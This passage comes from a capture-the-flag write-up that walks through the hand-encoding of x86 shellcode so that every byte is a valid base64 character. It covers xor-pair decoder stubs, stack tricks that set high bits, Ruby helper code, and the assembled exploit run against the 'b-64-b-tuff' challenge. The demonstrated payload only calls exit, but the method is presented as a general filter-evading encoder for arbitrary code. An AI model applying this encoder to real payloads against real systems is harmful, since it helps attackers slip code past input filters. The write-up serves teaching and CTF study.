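# Hypothetical helper: emit assembly that leaves 0x80 << (8 * shift) in edx.
# Assumes edi is 0 and the nearby stack memory is already zeroed.
def emit_msb_mask(shift)
  raise ArgumentError, 'shift must be 0..3' unless (0..3).cover?(shift)

  lines = [
    'push 0x41414146', 'pop eax', 'xor eax, 0x41414139', # eax -> 0x7F
    'push eax', 'pop edx', 'inc edx'                     # edx -> 0x80
  ]

  if shift > 0
    lines += ['push edi', 'push edx']
    lines += ['dec esp'] * shift   # misalign the stack by `shift` bytes
    lines << 'pop edx'             # read the value back, shifted
    lines += ['inc esp'] * shift   # undo the misalignment
  end

  lines
end

puts emit_msb_mask(2)
puts '; edx -> 0x%08x' % (0x80 << (8 * 2))
```

With a shift of 2 this prints the 0x00800000 sequence; 1 and 3 give the other two.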

Putting it all together

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |......AAAA..|

00000000  38 01 00 00 00 3b 41 41  41 41 4d 00              |8....;AAAAM.|
00000000  80 00 00 00 00 80 00 00  00 00 80 80              |............|
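
Those two rows are the original bytes split into their lower 7 bits and their top bit. A short sketch of that split (variable names are illustrative only):

```ruby
payload = "\xb8\x01\x00\x00\x00\xbb\x41\x41\x41\x41\xcd\x80".b

# Lower 7 bits of each byte: these can be built from xor pairs
low  = payload.bytes.map { |b| b & 0x7f }

# Just the top bit of each byte: these get patched in separately
high = payload.bytes.map { |b| b & 0x80 }

puts low.map  { |b| '%02x' % b }.join(' ')
puts high.map { |b| '%02x' % b }.join(' ')

# Combining the two halves with xor gives the original back
puts low.zip(high).map { |l, h| l ^ h } == payload.bytes
```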

38 01 00 00 -> 0x00000138
00 3b 41 41 -> 0x41413b00
41 41 4d 00 -> 0x004d4141

And then find the xor pairs to generate them just like before:

irb(main):061:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x00000138)
0x41414241 ^ 0x41414379

irb(main):062:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41413b00)
0x6a6a4141 ^ 0x2b2b7a41

irb(main):063:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x004d4141)
0x41626a6a ^ 0x412f2b2b

But here's where the twist comes: let's take the MSB string above, and also convert that to little-endian integers:

80 00 00 00 -> 0x00000080
00 80 00 00 -> 0x00008000
00 00 80 80 -> 0x80800000

Now, let's try writing our decoder stub just like before, except that after decoding the MSB-free value, we're going to separately inject the MSBs into the code!

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; 0x41410100
push eax
pop ecx

; xor the first pair
push 0x41414241
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00000080, so let's load it into edx
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the second pair
push 0x6a6a4141
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00008000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080

push edi ; 0x00000000
push edx
dec esp
pop edx ; edx is now 0x00008000
inc esp
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the third pair
push 0x41626a6a
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x80800000; we'll do it in two operations, with 0x00800000 first
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
pop edx ; edx is now 0x00800000
inc esp
inc esp
xor [ecx+0x41], edx

; And then the 0x80000000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp
pop edx ; edx is now 0x80000000
inc esp
inc esp
inc esp
xor [ecx+0x41], edx

; Padding (calculated based on the length above, subtracted from 0x141)
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAA'

; The second halves of the pairs (ie, the encoded data; this is where the decoded data will end up by the time execution gets here)
dd 0x41414379
dd 0x2b2b7a41
dd 0x412f2b2b

And that's it! Let's try it out! The code leading up to the padding assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41 50 50 50 50 50  |hAAAAX5AAAAPPPPP|
00000010  50 50 50 61 68 41 42 6a  6a 58 35 41 43 2b 2b 50  |PPPahABjjX5AC++P|
00000020  59 68 41 42 41 41 5a 31  51 41 68 46 41 41 41 58  |YhABAAZ1QAhFAAAX|
00000030  35 39 41 41 41 50 5a 42  31 51 41 41 41 41 41 68  |59AAAPZB1QAAAAAh|
00000040  41 41 6a 6a 5a 31 51 41  68 46 41 41 41 58 35 39  |AAjjZ1QAhFAAAX59|
00000050  41 41 41 50 5a 42 57 52  4c 5a 44 31 51 41 41 41  |AAAPZBWRLZD1QAAA|
00000060  41 41 68 6a 6a 62 41 5a  31 51 41 68 46 41 41 41  |AAhjjbAZ1QAhFAAA|
00000070  58 35 39 41 41 41 50 5a  42 57 52 4c 4c 5a 44 44  |X59AAAPZBWRLLZDD|
00000080  31 51 41 68 46 41 41 41  58 35 39 41 41 41 50 5a  |1QAhFAAAX59AAAPZ|
00000090  42 57 52 4c 4c 4c 5a 44  44 44 31 51 41           |BWRLLLZDDD1QA|

We can verify it's all base64 by eyeballing it. We can also determine that it's 0x9d bytes long, which means to get to 0x141 we need to pad it with 0xa4 bytes (already included above) before the encoded data. We can dump allll that code into a file, and run it with run_raw_code (don't forget to apply the patch from earlier to change the base address to 0x41410000, and don't forget to compile with -m32 for 32-bit mode):

$ nasm -o file file.asm
$ strace ./run_raw_code ./file
read(3, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 333) = 333
exit(1094795585)                        = ?
+++ exited with 65 +++

It works! And it only took me two tries (I missed the 'inc ecx' lines the first time :) ). I realize that it's a bit inefficient to encode 3 lines into like 100, but that's the cost of having a limited character set!

Solving the level

Bringing it back to the actual challenge... Now that we have working base64 code, the rest is pretty simple. Since the app encodes the base64 for us, we have to take what we have and decode it first, to get the string that would generate the base64 we want. Because base64 works in blocks and has padding, we're going to append a few meaningless bytes to the end, so that if anything gets messed up by landing in a partial block, it's those bytes rather than our code. Here's the full "exploit", assembled:

hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/A

We're going to add a few 'A's to the end for padding (the character we choose is meaningless), and run it through base64 -d (adding '='s to the end until we stop getting decoding errors):

$ echo 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=' | base64 -d | hexdump -Cv
00000000  84 00 00 01 7e 40 00 00  0f 3c f3 cf 3c f3 da 84  |....~@...<..<...|
00000010  00 63 8d 7e 40 0b ef 8f  62 10 01 00 06 75 40 08  |.c.~@...b....u@.|
00000020  45 00 00 17 e7 d0 00 00  f6 41 d5 00 00 00 00 21  |E........A.....!|
00000030  00 08 e3 67 54 00 84 50  00 01 7e 7d 00 00 0f 64  |...gT..P..~}...d|
00000040  15 91 2d 90 f5 40 00 00  00 08 63 8d b0 19 d5 00  |..-..@....c.....|
00000050  21 14 00 00 5f 9f 40 00  03 d9 05 64 4b 2d 90 c3  |!..._.@....dK-..|
00000060  d5 00 21 14 00 00 5f 9f  40 00 03 d9 05 64 4b 2c  |..!..._.@....dK,|
00000070  b6 43 0c 3d 50 00 00 00  00 00 00 00 00 00 00 00  |.C.=P...........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000f0  03 20 80 00 0c fe fb ef  bf 00 00 00 00 00        |. ............|
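
The same decode step can be sketched in Ruby without guessing at the number of '='s. This is a variation on what I did above, not the exact same thing: it pads with 'A's up to a whole number of 4-character blocks (so it ends up with 252 bytes instead of 254), and pad_to_block is a made-up helper name. The pack/unpack 'm0' directive is core Ruby's strict base64.

```ruby
# The assembled exploit: decoder stub, 0xa4 'A's of padding, then the
# 12-byte encoded payload.
STUB_CODE = 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAh' \
            'AAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD' \
            '1QAhFAAAX59AAAPZBWRLLLZDDD1QA'
EXPLOIT = STUB_CODE + ('A' * 0xa4) + 'yCAAAz++++/A'

# Append a meaningless filler character until the length is a multiple of 4,
# so the decoder never needs '=' padding (hypothetical helper).
def pad_to_block(code, filler = 'A')
  code + filler * ((-code.length) % 4)
end

PADDED = pad_to_block(EXPLOIT)
RAW    = PADDED.unpack1('m0')   # strict base64 decode; raises on bad input

# Re-encoding should give back something that starts with our code.
round_trip = [RAW].pack('m0')

puts "exploit is #{EXPLOIT.length} characters, padded to #{PADDED.length}"
puts "send #{RAW.bytesize} raw bytes"
puts "round trip ok: #{round_trip.start_with?(EXPLOIT)}"
```

The round-trip check is the important part: whatever bytes we send, a standard base64 encoder has to turn them back into a string that begins with our code.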

Let's convert that into a string that we can use on the commandline by chaining together a bunch of shell commands:

$ echo -ne 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=' | base64 -d | xxd -g1 | cut -b10-57 | tr -d '\n' | sed 's/ /\\x/g'
\x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00
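
If you'd rather not count xxd columns, here's a rough Ruby equivalent of that pipeline. It's only a sketch, to_escapes is a name I made up, and to keep it short it only converts the first 12 characters of the exploit.

```ruby
# Turn raw bytes into a string of \xNN escapes suitable for echo -ne '...'.
# (Hypothetical helper, not part of any tool mentioned in this post.)
def to_escapes(raw)
  raw.each_byte.map { |b| format('\x%02x', b) }.join
end

# First 12 characters of the exploit, decoded with core Ruby's strict base64.
raw = 'hAAAAX5AAAAP'.unpack1('m0')

puts to_escapes(raw)
# => \x84\x00\x00\x01\x7e\x40\x00\x00\x0f
```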

And, finally, feed all that into b-64-b-tuff:

$ echo -ne '\x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00' | strace ./b-64-b-tuff
read(0, "\204\0\0\1~@\0\0\17<\363\317<\363\332\204\0c\215~@\v\357\217b\20\1\0\6u@\10"..., 4096) = 254
write(1, "Read 254 bytes!\n", 16Read 254 bytes!
)       = 16
write(1, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 340hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=) = 340
write(1, "\n", 1
)                       = 1
exit(1094795585)                        = ?
+++ exited with 65 +++

And, sure enough, it exited with the status that we wanted! Now that we've encoded 12 bytes of shellcode, we can encode any amount of arbitrary code that we choose to!

Summary

So that, ladies and gentlemen and everyone else, is how to encode some simple shellcode into base64 by hand. My solution does almost exactly those steps, but in an automated fashion. I also found a few shortcuts while writing the blog that aren't included in that code. To summarize:

Pad the input to a multiple of 4 bytes
Break the input up into 4-byte blocks, and find an xor pair that generates each value
Set ecx to an address that's 0x41 bytes before the encoded payload, which is one half of the xor pairs
Put the other half of each xor pair in-line, loaded into edx and xor'd with the encoded payload
If any bytes have their most significant bit set, set edx to 0x80, use the stack to shift it into the right byte position, and insert it with a xor
After all the xors, add padding that's base64-compatible, but is effectively a no-op, to bridge between the decoder and the encoded payload
End with the encoded payload (the second half of the xor pairs)
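
To make the first couple of steps concrete, here's a minimal Ruby sketch of the pair-finding part. It is not my actual tool: xor_pair and encode_blocks are names invented for this example, padding with 0x90 (nop) is an assumption, and the shellcode bytes are the 12-byte exit(0x41414141) as I reconstruct it from the dumps above. It only works out the pairs and which bytes need their top bit set; it doesn't emit the decoder stub.

```ruby
# Allowed bytes. Swap this for an alphanumeric-only set to get alphanumeric
# pairs instead.
SET = (('A'..'Z').to_a + ('a'..'z').to_a + ('0'..'9').to_a + ['+', '/']).map(&:ord)

# Find two allowed bytes whose xor equals the low 7 bits of `byte`.
# The top bit is handled separately, since no allowed byte has it set.
def xor_pair(byte)
  low = byte & 0x7f
  SET.each do |a|
    b = a ^ low
    return [a, b] if SET.include?(b)
  end
  raise ArgumentError, format('no xor pair for 0x%02x', byte)
end

# Returns one hash per 4-byte block:
#   :inline - the half of each pair that the decoder pushes
#   :stored - the half that sits at the end as the encoded payload
#   :msb    - indexes (0..3) of bytes that need 0x80 xor'd in afterwards
def encode_blocks(shellcode, pad_byte = 0x90)
  bytes = shellcode.bytes
  bytes << pad_byte until (bytes.length % 4).zero?
  bytes.each_slice(4).map do |block|
    pairs = block.map { |b| xor_pair(b) }
    {
      inline: pairs.map(&:first).pack('C*'),
      stored: pairs.map(&:last).pack('C*'),
      msb:    block.each_index.select { |i| block[i] >= 0x80 }
    }
  end
end

# mov eax, 1 / mov ebx, 0x41414141 / int 0x80
shellcode = "\xb8\x01\x00\x00\x00\xbb\x41\x41\x41\x41\xcd\x80".b
encode_blocks(shellcode).each { |blk| p blk }
```

The pairs this picks won't necessarily match the ones in the exploit above, since there's usually more than one valid pair for a given byte. Any pair works as long as both halves stay in the set.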

When the code runs, it xors each pair, and writes it in-line to where the encoded value was. It sets the MSB bits as needed. The padding runs, which is an effective no-op, then finally the freshly decoded code runs. It's complex, but hopefully this blog helps explain it!
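
And here's that decode step simulated in Ruby, using the values from the exploit above: the three immediates that get pushed (the bytes after each 'h' right before a 'Z'), the 12-byte encoded payload at the very end, and which bytes get 0x80 xor'd in. This is a sketch of the arithmetic only, not an x86 emulator.

```ruby
# Values read off the assembled exploit.
STORED  = 'yCAAAz++++/A'          # encoded payload at the very end
INLINE  = %w[ABAA AAjj jjbA]      # immediates loaded into edx before each xor
MSB_SET = [[0], [1], [2, 3]]      # per block: bytes that get 0x80 xor'd in

DECODED = STORED.bytes.each_slice(4).with_index.flat_map do |block, n|
  block.each_with_index.map do |byte, i|
    value = byte ^ INLINE[n].getbyte(i)        # xor [ecx+0x41], edx
    value ^= 0x80 if MSB_SET[n].include?(i)    # shifted 0x80, xor'd in afterwards
    value
  end
end

puts DECODED.map { |b| format('%02x', b) }.join(' ')
# => b8 01 00 00 00 bb 41 41 41 41 cd 80
```

Those 12 bytes are mov eax, 1 / mov ebx, 0x41414141 / int 0x80, which is the exit(1094795585) that shows up in the strace output.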